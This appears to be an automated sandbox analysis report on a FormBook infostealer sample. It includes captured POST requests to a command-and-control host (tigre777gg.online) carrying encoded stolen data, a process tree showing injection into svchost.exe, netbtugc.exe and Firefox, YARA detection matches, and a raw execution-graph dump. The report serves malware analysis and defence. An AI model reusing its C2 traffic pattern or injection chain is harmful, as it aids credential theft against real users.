                              Referer: http://www.tigre777gg.online/06rp/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                              Data Ascii: yXf=+gx9o4ylIYGL+MhgZqlNhYkhdY9b8OTmFaBlanDLEDLDQR7RYLBi5C/7abndbAY4LeagZD/2AmhkjjXHPa2OUEQ3qRfh8OnLSnfKMUpx8vOAXNMT7ZhaknTDXC1/S9mZ7mn4dPY8vwc+hsLfhWKY0WnaPZ4AdL5w4xBwDb0dBp5a8BZTM+oki82XCIwbXBuCpRDlOOyiu9yYwG8sRbbWjV8=


                              Session ID: 15 | Source IP: 192.168.2.11 | Source Port: 49725 | Destination IP: 3.33.130.190 | Destination Port: 80
                              Timestamp: Sep 11, 2024 14:26:26.043894053 CEST | Bytes transferred: 1821 | Direction: OUT
                              Data: POST /06rp/ HTTP/1.1
                              Host: www.tigre777gg.online
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-US
                              Connection: close
                              Content-Length: 1232
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: no-cache
                              Origin: http://www.tigre777gg.online
                              Referer: http://www.tigre777gg.online/06rp/
                              User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36



                              Target ID:0
                              Start time:08:24:19
                              Start date:11/09/2024
                              Path:C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
                              Imagebase:0xc60000
                              File size:1'209'344 bytes
                              MD5 hash:B2218F5D997FCAD8FFD678A82CA0A9B2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:true

                              Target ID:2
                              Start time:08:24:20
                              Start date:11/09/2024
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\3T-ENQ-O-2024-10856.exe"
                              Imagebase:0x650000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1812678721.0000000003960000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1812298134.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1813082364.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:08:24:57
                              Start date:11/09/2024
                              Path:C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe"
                              Imagebase:0xba0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2599631540.00000000031B0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              Target ID:5
                              Start time:08:24:58
                              Start date:11/09/2024
                              Path:C:\Windows\SysWOW64\netbtugc.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                              Imagebase:0x270000
                              File size:22'016 bytes
                              MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2599223340.00000000034B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2599340690.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.2597752897.0000000003000000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:moderate
                              Has exited:false

                              Target ID:8
                              Start time:08:25:11
                              Start date:11/09/2024
                              Path:C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Program Files (x86)\sBZvwhrkhmuftPhYLlaJDCkmNCAEyLAuDLzLIokvXWwtCepIYgeNmvDbnPGKJGJgCGDzktik\CgEnKbPFVbMNeA.exe"
                              Imagebase:0xba0000
                              File size:140'800 bytes
                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.2601820210.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              Reputation:high
                              Has exited:false

                              Target ID:10
                              Start time:08:25:29
                              Start date:11/09/2024
                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                              Imagebase:0x7ff6de060000
                              File size:676'768 bytes
                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true


                                Execution Graph

                                Execution Coverage:3.2%
                                Dynamic/Decrypted Code Coverage:1%
                                Signature Coverage:10%
                                Total number of Nodes:1820
                                Total number of Limit Nodes:160
108996->108998 109000 cd2185 _wcscpy 108996->109000 109003 c64477 48 API calls 108996->109003 108999 c643e7 108998->108999 108998->109000 109182 c63320 108999->109182 109008 c64477 48 API calls 109000->109008 109001 cd216e 109002 c64477 48 API calls 109001->109002 109005 cd217d 109002->109005 109006 c643b8 _wcscpy 109003->109006 109005->109000 109011 c64477 48 API calls 109006->109011 109007 c643ff 109193 c714a0 109007->109193 109009 cd21ab 109008->109009 109009->109009 109011->108998 109012 c714a0 48 API calls 109014 c6440f 109012->109014 109014->109012 109015 c64477 48 API calls 109014->109015 109016 c64451 Mailbox 109014->109016 109209 c67bef 48 API calls 109014->109209 109015->109014 109016->108907 109018 cd3ce4 _memset 109017->109018 109019 c63c1f 109017->109019 109021 cd3cf6 GetOpenFileNameW 109018->109021 109729 c631b8 109019->109729 109021->109019 109023 c637c0 109021->109023 109022 c63c28 109736 c63a67 SHGetMalloc 109022->109736 109023->108910 109023->108919 109025 c63c31 109741 c63b45 GetFullPathNameW 109025->109741 109804 c6a716 109029->109804 109031 c63501 109043 c63575 109031->109043 109815 c621dd 86 API calls 109031->109815 109033 c6350a 109033->109043 109816 c65460 88 API calls Mailbox 109033->109816 109035 c63513 109036 c63517 GetFullPathNameW 109035->109036 109035->109043 109037 c67e53 48 API calls 109036->109037 109038 c63541 109037->109038 109039 c67e53 48 API calls 109038->109039 109040 c6354e 109039->109040 109041 cd66b4 _wcscat 109040->109041 109042 c67e53 48 API calls 109040->109042 109042->109043 109043->108917 109043->108922 109045 c6310f 109044->109045 109046 cd21b0 109044->109046 109821 c6318a 109045->109821 109050 c63185 109051 c62e9d CreateWindowExW CreateWindowExW ShowWindow ShowWindow 109050->109051 109051->108931 109053 c6e216 109052->109053 109112 c6e226 Mailbox 109052->109112 109054 c6e670 109053->109054 109053->109112 109974 c7ecee 346 API calls 109054->109974 109056 c63842 109056->108910 109113 c62b94 Shell_NotifyIconW _memset 
109056->109113 109058 c6e681 109058->109056 109060 c6e68e 109058->109060 109059 c6e26c PeekMessageW 109059->109112 109976 c7ec33 346 API calls Mailbox 109060->109976 109062 cd5b13 Sleep 109062->109112 109063 c6e695 LockWindowUpdate DestroyWindow GetMessageW 109063->109056 109066 c6e6c7 109063->109066 109064 c6e4e7 109064->109056 109975 c6322e 16 API calls 109064->109975 109068 cd62a7 TranslateMessage DispatchMessageW GetMessageW 109066->109068 109068->109068 109069 cd62d7 109068->109069 109069->109056 109070 c6e657 PeekMessageW 109070->109112 109071 c8010a 48 API calls 109071->109112 109072 c6e517 timeGetTime 109072->109112 109075 cd5dfc WaitForSingleObject 109078 cd5e19 GetExitCodeProcess CloseHandle 109075->109078 109075->109112 109076 c6e641 TranslateMessage DispatchMessageW 109076->109070 109077 cd6147 Sleep 109107 cd5cce Mailbox 109077->109107 109078->109112 109079 c6d3d2 48 API calls 109079->109107 109080 c61000 322 API calls 109080->109112 109081 c6e6cc timeGetTime 109977 c7cf79 49 API calls 109081->109977 109083 cd5feb Sleep 109083->109107 109086 c7e3a5 timeGetTime 109086->109107 109087 cd61de GetExitCodeProcess 109090 cd620a CloseHandle 109087->109090 109091 cd61f4 WaitForSingleObject 109087->109091 109089 cd5cea Sleep 109089->109112 109090->109107 109091->109090 109091->109112 109092 cd5cd7 Sleep 109092->109089 109093 cc8a48 108 API calls 109093->109107 109095 c61dce 107 API calls 109095->109107 109096 cd6266 Sleep 109096->109112 109097 c7cf79 49 API calls 109097->109112 109100 c6caee 48 API calls 109100->109107 109103 c6d380 55 API calls 109103->109107 109107->109079 109107->109086 109107->109087 109107->109089 109107->109092 109107->109093 109107->109095 109107->109096 109107->109100 109107->109103 109107->109112 109980 ca56dc 49 API calls Mailbox 109107->109980 109981 c7cf79 49 API calls 109107->109981 109982 c61000 346 API calls 109107->109982 110023 cbd12a 50 API calls 109107->110023 110024 ca8355 QueryPerformanceCounter QueryPerformanceFrequency 
Sleep QueryPerformanceCounter Sleep 109107->110024 110025 ca6f5b 63 API calls 3 library calls 109107->110025 109108 c6caee 48 API calls 109108->109112 109109 cad520 86 API calls 109109->109112 109111 c6d380 55 API calls 109111->109112 109112->109059 109112->109062 109112->109064 109112->109070 109112->109071 109112->109072 109112->109075 109112->109076 109112->109077 109112->109080 109112->109081 109112->109083 109112->109089 109112->109097 109112->109107 109112->109108 109112->109109 109112->109111 109827 c6e7e0 109112->109827 109834 c6ea00 109112->109834 109884 c744e0 109112->109884 109901 c6e7b0 346 API calls Mailbox 109112->109901 109902 c73680 109112->109902 109972 c7f381 TranslateAcceleratorW 109112->109972 109973 c7ed1a IsDialogMessageW GetClassLongW 109112->109973 109978 c6c935 48 API calls 109112->109978 109979 cc8b20 48 API calls 109112->109979 109983 c6fa40 109112->109983 109113->108910 109114->108917 109115->108927 109117 c6cafd __NMSG_WRITE _memmove 109116->109117 109118 c8010a 48 API calls 109117->109118 109119 c6cb3b 109118->109119 109119->108937 109119->108938 109120->108942 109121->108948 109122->108943 109123->108943 109125 c6d3d2 48 API calls 109124->109125 109126 c63c80 109125->109126 109127 c6a359 109126->109127 109128 c6a366 __ftell_nolock 109127->109128 109129 c67e53 48 API calls 109128->109129 109134 c6a4cc Mailbox 109128->109134 109131 c6a398 109129->109131 109140 c6a3ce Mailbox 109131->109140 109211 c6a4f6 109131->109211 109132 c6a4f6 48 API calls 109132->109140 109133 c6a49f 109133->109134 109135 c6caee 48 API calls 109133->109135 109134->108957 109137 c6a4c0 109135->109137 109136 c6caee 48 API calls 109136->109140 109215 c65b47 48 API calls _memmove 109137->109215 109140->109132 109140->109133 109140->109134 109140->109136 109214 c65b47 48 API calls _memmove 109140->109214 109216 c63f9b 109141->109216 109144 c634ea 109153 c68182 109144->109153 109147 cd34c3 109148 c828ca _free 47 API calls 109147->109148 109150 cd34d0 109148->109150 
109151 c63e39 84 API calls 109150->109151 109152 cd34d9 109151->109152 109152->109152 109154 c8010a 48 API calls 109153->109154 109155 c642ad 109154->109155 109155->108962 109157 c6d38b 109156->109157 109158 c6d3b4 109157->109158 109718 c6d772 55 API calls 109157->109718 109158->108965 109161 c6d30a 109160->109161 109162 c6d2df 109160->109162 109161->108973 109165 c6d2e6 109162->109165 109720 c6d349 53 API calls 109162->109720 109165->109161 109719 c6d349 53 API calls 109165->109719 109167 c64481 109166->109167 109168 c6449a 109166->109168 109721 c6c935 48 API calls 109167->109721 109169 c67e53 48 API calls 109168->109169 109171 c64347 109169->109171 109172 c81bc7 109171->109172 109173 c81c48 109172->109173 109174 c81bd3 109172->109174 109724 c81c5a 59 API calls 3 library calls 109173->109724 109178 c81bf8 109174->109178 109722 c8889e 47 API calls __getptd_noexit 109174->109722 109177 c81c55 109177->108979 109178->108979 109179 c81bdf 109723 c87aa0 8 API calls __mbsnbicoll_l 109179->109723 109181 c81bea 109181->108979 109183 c63334 109182->109183 109185 c63339 Mailbox 109182->109185 109725 c6342c 48 API calls 109183->109725 109189 c63347 109185->109189 109726 c6346e 48 API calls 109185->109726 109187 c8010a 48 API calls 109188 c633d8 109187->109188 109191 c8010a 48 API calls 109188->109191 109189->109187 109190 c63422 109189->109190 109190->109007 109192 c633e3 109191->109192 109192->109007 109194 c71606 109193->109194 109197 c714b2 109193->109197 109194->109014 109195 c714be 109201 c714c9 109195->109201 109728 c6346e 48 API calls 109195->109728 109197->109195 109198 c8010a 48 API calls 109197->109198 109199 cd5299 109198->109199 109202 c8010a 48 API calls 109199->109202 109200 c7156d 109200->109014 109201->109200 109203 c8010a 48 API calls 109201->109203 109207 cd52a4 109202->109207 109204 c715af 109203->109204 109205 c715c2 109204->109205 109727 c7d6b4 48 API calls 109204->109727 109205->109014 109207->109195 109208 c8010a 48 API calls 109207->109208 
109208->109207 109209->109014 109210->109001 109212 c6b8a7 48 API calls 109211->109212 109213 c6a501 109212->109213 109213->109131 109214->109140 109215->109134 109281 c63f5d 109216->109281 109221 c63fc6 LoadLibraryExW 109291 c63e78 109221->109291 109222 cd5830 109224 c63e39 84 API calls 109222->109224 109226 cd5837 109224->109226 109228 c63e78 3 API calls 109226->109228 109230 cd583f 109228->109230 109229 c63fed 109229->109230 109231 c63ff9 109229->109231 109317 c6417d 109230->109317 109233 c63e39 84 API calls 109231->109233 109235 c634e2 109233->109235 109235->109144 109240 cacc82 109235->109240 109237 cd5866 109323 c641cb 109237->109323 109239 cd5873 109241 c641a7 83 API calls 109240->109241 109242 caccf1 109241->109242 109496 cace59 94 API calls 2 library calls 109242->109496 109244 cacd03 109245 c6417d 64 API calls 109244->109245 109273 cacd07 109244->109273 109246 cacd1e 109245->109246 109247 c6417d 64 API calls 109246->109247 109248 cacd2e 109247->109248 109249 c6417d 64 API calls 109248->109249 109250 cacd49 109249->109250 109251 c6417d 64 API calls 109250->109251 109252 cacd64 109251->109252 109253 c641a7 83 API calls 109252->109253 109254 cacd7b 109253->109254 109255 c845ec __malloc_crt 47 API calls 109254->109255 109256 cacd82 109255->109256 109257 c845ec __malloc_crt 47 API calls 109256->109257 109258 cacd8c 109257->109258 109259 c6417d 64 API calls 109258->109259 109260 cacda0 109259->109260 109497 cac846 GetSystemTimeAsFileTime 109260->109497 109262 cacdb3 109263 cacdc8 109262->109263 109264 cacddd 109262->109264 109265 c828ca _free 47 API calls 109263->109265 109266 cace42 109264->109266 109267 cacde3 109264->109267 109268 cacdce 109265->109268 109270 c828ca _free 47 API calls 109266->109270 109498 cac251 118 API calls __fcloseall 109267->109498 109271 c828ca _free 47 API calls 109268->109271 109270->109273 109271->109273 109272 cace3a 109274 c828ca _free 47 API calls 109272->109274 109273->109147 109275 c63e39 109273->109275 109274->109273 109276 
c63e43 109275->109276 109277 c63e4a 109275->109277 109499 c84274 109276->109499 109279 c63e6a FreeLibrary 109277->109279 109280 c63e59 109277->109280 109279->109280 109280->109147 109328 c63f20 109281->109328 109284 c63f85 109286 c63f96 109284->109286 109287 c63f8d FreeLibrary 109284->109287 109288 c84129 109286->109288 109287->109286 109336 c8413e 109288->109336 109290 c63fba 109290->109221 109290->109222 109415 c63eb3 109291->109415 109295 c63eb1 109298 c64010 109295->109298 109296 c63ea8 FreeLibrary 109296->109295 109297 c63e9f 109297->109295 109297->109296 109299 c8010a 48 API calls 109298->109299 109300 c64025 109299->109300 109301 c64bce 48 API calls 109300->109301 109302 c64031 _memmove 109301->109302 109303 c6406c 109302->109303 109304 c64161 109302->109304 109305 c64129 109302->109305 109306 c641cb 57 API calls 109303->109306 109434 cad03f 93 API calls 109304->109434 109423 c631f2 CreateStreamOnHGlobal 109305->109423 109314 c64075 109306->109314 109309 c6417d 64 API calls 109309->109314 109310 c64109 109310->109229 109312 cd5794 109313 c641a7 83 API calls 109312->109313 109315 cd57a8 109313->109315 109314->109309 109314->109310 109314->109312 109429 c641a7 109314->109429 109316 c6417d 64 API calls 109315->109316 109316->109310 109318 cd587d 109317->109318 109319 c6418f 109317->109319 109458 c844ae 109319->109458 109322 cac846 GetSystemTimeAsFileTime 109322->109237 109324 cd58bf 109323->109324 109325 c641da 109323->109325 109478 c84af5 109325->109478 109327 c641e2 109327->109239 109332 c63f32 109328->109332 109331 c63f08 LoadLibraryA GetProcAddress 109331->109284 109333 c63f28 109332->109333 109334 c63f3b LoadLibraryA 109332->109334 109333->109284 109333->109331 109334->109333 109335 c63f4c GetProcAddress 109334->109335 109335->109333 109338 c8414a __tzset_nolock 109336->109338 109337 c8415d 109384 c8889e 47 API calls __getptd_noexit 109337->109384 109338->109337 109341 c8418e 109338->109341 109340 c84162 109385 c87aa0 8 API calls __mbsnbicoll_l 
109340->109385 109355 c8f278 109341->109355 109344 c84193 109345 c841a9 109344->109345 109346 c8419c 109344->109346 109348 c841d3 109345->109348 109349 c841b3 109345->109349 109386 c8889e 47 API calls __getptd_noexit 109346->109386 109369 c8f390 109348->109369 109387 c8889e 47 API calls __getptd_noexit 109349->109387 109351 c8416d __tzset_nolock @_EH4_CallFilterFunc@8 109351->109290 109356 c8f284 __tzset_nolock 109355->109356 109357 c88984 __lock 47 API calls 109356->109357 109358 c8f292 109357->109358 109359 c8f309 109358->109359 109365 c88a0c __mtinitlocknum 47 API calls 109358->109365 109367 c8f302 109358->109367 109392 c85ade 48 API calls __lock 109358->109392 109393 c85b48 LeaveCriticalSection LeaveCriticalSection _doexit 109358->109393 109394 c87660 47 API calls __malloc_crt 109359->109394 109362 c8f310 109363 c8f31f InitializeCriticalSectionAndSpinCount EnterCriticalSection 109362->109363 109362->109367 109363->109367 109364 c8f37c __tzset_nolock 109364->109344 109365->109358 109389 c8f387 109367->109389 109370 c8f3b0 __wopenfile 109369->109370 109371 c8f3ca 109370->109371 109383 c8f585 109370->109383 109401 c8247b 59 API calls 2 library calls 109370->109401 109399 c8889e 47 API calls __getptd_noexit 109371->109399 109373 c8f3cf 109400 c87aa0 8 API calls __mbsnbicoll_l 109373->109400 109375 c841de 109388 c84200 LeaveCriticalSection LeaveCriticalSection _fprintf 109375->109388 109376 c8f5e8 109396 c97179 109376->109396 109379 c8f57e 109379->109383 109402 c8247b 59 API calls 2 library calls 109379->109402 109381 c8f59d 109381->109383 109403 c8247b 59 API calls 2 library calls 109381->109403 109383->109371 109383->109376 109384->109340 109385->109351 109386->109351 109387->109351 109388->109351 109395 c88ae8 LeaveCriticalSection 109389->109395 109391 c8f38e 109391->109364 109392->109358 109393->109358 109394->109362 109395->109391 109404 c96961 109396->109404 109398 c97192 109398->109375 109399->109373 109400->109375 109401->109379 109402->109381 109403->109383 
109406 c9696d __tzset_nolock 109404->109406 109405 c9697f 109407 c8889e __mbsnbicoll_l 47 API calls 109405->109407 109406->109405 109408 c969b6 109406->109408 109409 c96984 109407->109409 109410 c96a28 __wsopen_helper 110 API calls 109408->109410 109411 c87aa0 __mbsnbicoll_l 8 API calls 109409->109411 109412 c969d3 109410->109412 109414 c9698e __tzset_nolock 109411->109414 109413 c969fc __wsopen_helper LeaveCriticalSection 109412->109413 109413->109414 109414->109398 109419 c63ec5 109415->109419 109418 c63ef0 LoadLibraryA GetProcAddress 109418->109297 109420 c63e91 109419->109420 109421 c63ece LoadLibraryA 109419->109421 109420->109297 109420->109418 109421->109420 109422 c63edf GetProcAddress 109421->109422 109422->109420 109424 c6320c FindResourceExW 109423->109424 109428 c63229 109423->109428 109425 cd57d3 LoadResource 109424->109425 109424->109428 109426 cd57e8 SizeofResource 109425->109426 109425->109428 109427 cd57fc LockResource 109426->109427 109426->109428 109427->109428 109428->109303 109430 c641b6 109429->109430 109433 cd589d 109429->109433 109435 c8471d 109430->109435 109432 c641c4 109432->109314 109434->109303 109439 c84729 __tzset_nolock 109435->109439 109436 c84737 109448 c8889e 47 API calls __getptd_noexit 109436->109448 109438 c8475d 109450 c85a9f 109438->109450 109439->109436 109439->109438 109441 c8473c 109449 c87aa0 8 API calls __mbsnbicoll_l 109441->109449 109442 c84763 109456 c8468e 81 API calls 4 library calls 109442->109456 109445 c84747 __tzset_nolock 109445->109432 109446 c84772 109457 c84794 LeaveCriticalSection LeaveCriticalSection _fprintf 109446->109457 109448->109441 109449->109445 109451 c85aaf 109450->109451 109452 c85ad1 EnterCriticalSection 109450->109452 109451->109452 109453 c85ab7 109451->109453 109454 c85ac7 109452->109454 109455 c88984 __lock 47 API calls 109453->109455 109454->109442 109455->109454 109456->109446 109457->109445 109461 c844c9 109458->109461 109460 c641a0 109460->109322 109462 c844d5 __tzset_nolock 
109461->109462 109463 c84518 109462->109463 109464 c844eb _memset 109462->109464 109465 c84510 __tzset_nolock 109462->109465 109466 c85a9f __lock_file 48 API calls 109463->109466 109474 c8889e 47 API calls __getptd_noexit 109464->109474 109465->109460 109468 c8451e 109466->109468 109476 c842eb 62 API calls 6 library calls 109468->109476 109469 c84505 109475 c87aa0 8 API calls __mbsnbicoll_l 109469->109475 109472 c84534 109477 c84552 LeaveCriticalSection LeaveCriticalSection _fprintf 109472->109477 109474->109469 109475->109465 109476->109472 109477->109465 109479 c84b01 __tzset_nolock 109478->109479 109480 c84b0f 109479->109480 109481 c84b24 109479->109481 109492 c8889e 47 API calls __getptd_noexit 109480->109492 109483 c85a9f __lock_file 48 API calls 109481->109483 109485 c84b2a 109483->109485 109484 c84b14 109493 c87aa0 8 API calls __mbsnbicoll_l 109484->109493 109494 c8479c 55 API calls 5 library calls 109485->109494 109488 c84b1f __tzset_nolock 109488->109327 109489 c84b35 109495 c84b55 LeaveCriticalSection LeaveCriticalSection _fprintf 109489->109495 109491 c84b47 109491->109488 109492->109484 109493->109488 109494->109489 109495->109491 109496->109244 109497->109262 109498->109272 109500 c84280 __tzset_nolock 109499->109500 109501 c842ac 109500->109501 109502 c84294 109500->109502 109504 c85a9f __lock_file 48 API calls 109501->109504 109508 c842a4 __tzset_nolock 109501->109508 109528 c8889e 47 API calls __getptd_noexit 109502->109528 109506 c842be 109504->109506 109505 c84299 109529 c87aa0 8 API calls __mbsnbicoll_l 109505->109529 109512 c84208 109506->109512 109508->109277 109513 c8422b 109512->109513 109514 c84217 109512->109514 109520 c84227 109513->109520 109531 c83914 109513->109531 109571 c8889e 47 API calls __getptd_noexit 109514->109571 109517 c8421c 109572 c87aa0 8 API calls __mbsnbicoll_l 109517->109572 109530 c842e3 LeaveCriticalSection LeaveCriticalSection _fprintf 109520->109530 109524 c84245 109548 c8f782 109524->109548 109526 c8424b 
109526->109520 109527 c828ca _free 47 API calls 109526->109527 109527->109520 109528->109505 109529->109508 109530->109508 109532 c83927 109531->109532 109536 c8394b 109531->109536 109533 c835c3 __flswbuf 47 API calls 109532->109533 109532->109536 109534 c83944 109533->109534 109573 c8bd14 109534->109573 109537 c8f8e6 109536->109537 109538 c8423f 109537->109538 109539 c8f8f3 109537->109539 109541 c835c3 109538->109541 109539->109538 109540 c828ca _free 47 API calls 109539->109540 109540->109538 109542 c835cd 109541->109542 109543 c835e2 109541->109543 109679 c8889e 47 API calls __getptd_noexit 109542->109679 109543->109524 109545 c835d2 109680 c87aa0 8 API calls __mbsnbicoll_l 109545->109680 109547 c835dd 109547->109524 109549 c8f78e __tzset_nolock 109548->109549 109550 c8f7ae 109549->109550 109551 c8f796 109549->109551 109553 c8f82b 109550->109553 109558 c8f7d8 109550->109558 109696 c8886a 47 API calls __getptd_noexit 109551->109696 109700 c8886a 47 API calls __getptd_noexit 109553->109700 109554 c8f79b 109697 c8889e 47 API calls __getptd_noexit 109554->109697 109557 c8f830 109701 c8889e 47 API calls __getptd_noexit 109557->109701 109560 c8b6a0 ___lock_fhandle 49 API calls 109558->109560 109562 c8f7de 109560->109562 109561 c8f838 109702 c87aa0 8 API calls __mbsnbicoll_l 109561->109702 109564 c8f7fc 109562->109564 109565 c8f7f1 109562->109565 109698 c8889e 47 API calls __getptd_noexit 109564->109698 109681 c8f84c 109565->109681 109568 c8f7a3 __tzset_nolock 109568->109526 109569 c8f7f7 109699 c8f823 LeaveCriticalSection __unlock_fhandle 109569->109699 109571->109517 109572->109520 109574 c8bd20 __tzset_nolock 109573->109574 109575 c8bd28 109574->109575 109576 c8bd40 109574->109576 109671 c8886a 47 API calls __getptd_noexit 109575->109671 109577 c8bdd5 109576->109577 109582 c8bd72 109576->109582 109676 c8886a 47 API calls __getptd_noexit 109577->109676 109579 c8bd2d 109672 c8889e 47 API calls __getptd_noexit 109579->109672 109598 c8b6a0 109582->109598 109583 c8bdda 
109677 c8889e 47 API calls __getptd_noexit 109583->109677 109584 c8bd35 __tzset_nolock 109584->109536 109587 c8bd78 109589 c8bd8b 109587->109589 109590 c8bd9e 109587->109590 109588 c8bde2 109678 c87aa0 8 API calls __mbsnbicoll_l 109588->109678 109607 c8bdf6 109589->109607 109673 c8889e 47 API calls __getptd_noexit 109590->109673 109594 c8bda3 109674 c8886a 47 API calls __getptd_noexit 109594->109674 109595 c8bd97 109675 c8bdcd LeaveCriticalSection __unlock_fhandle 109595->109675 109599 c8b6ac __tzset_nolock 109598->109599 109600 c8b6f9 EnterCriticalSection 109599->109600 109601 c88984 __lock 47 API calls 109599->109601 109602 c8b71f __tzset_nolock 109600->109602 109603 c8b6d0 109601->109603 109602->109587 109604 c8b6db InitializeCriticalSectionAndSpinCount 109603->109604 109605 c8b6ed 109603->109605 109604->109605 109606 c8b723 ___lock_fhandle LeaveCriticalSection 109605->109606 109606->109600 109608 c8be03 __ftell_nolock 109607->109608 109609 c8be35 109608->109609 109610 c8be5f 109608->109610 109611 c8be40 109608->109611 109612 c8b4bf __atodbl_l 6 API calls 109609->109612 109614 c8beb8 109610->109614 109615 c8be9c 109610->109615 109613 c8886a __set_osfhnd 47 API calls 109611->109613 109616 c8c61e 109612->109616 109617 c8be45 109613->109617 109619 c8becf 109614->109619 109621 c905df __lseeki64_nolock 49 API calls 109614->109621 109618 c8886a __set_osfhnd 47 API calls 109615->109618 109616->109595 109620 c8889e __mbsnbicoll_l 47 API calls 109617->109620 109624 c8bea1 109618->109624 109623 c949a2 __flswbuf 47 API calls 109619->109623 109622 c8be4c 109620->109622 109621->109619 109625 c87aa0 __mbsnbicoll_l 8 API calls 109622->109625 109629 c8bedd 109623->109629 109626 c8889e __mbsnbicoll_l 47 API calls 109624->109626 109625->109609 109628 c8bea8 109626->109628 109627 c8c1fe 109630 c8c56b WriteFile 109627->109630 109631 c8c216 109627->109631 109632 c87aa0 __mbsnbicoll_l 8 API calls 109628->109632 109629->109627 109634 c8869d __beginthread 47 API calls 109629->109634 
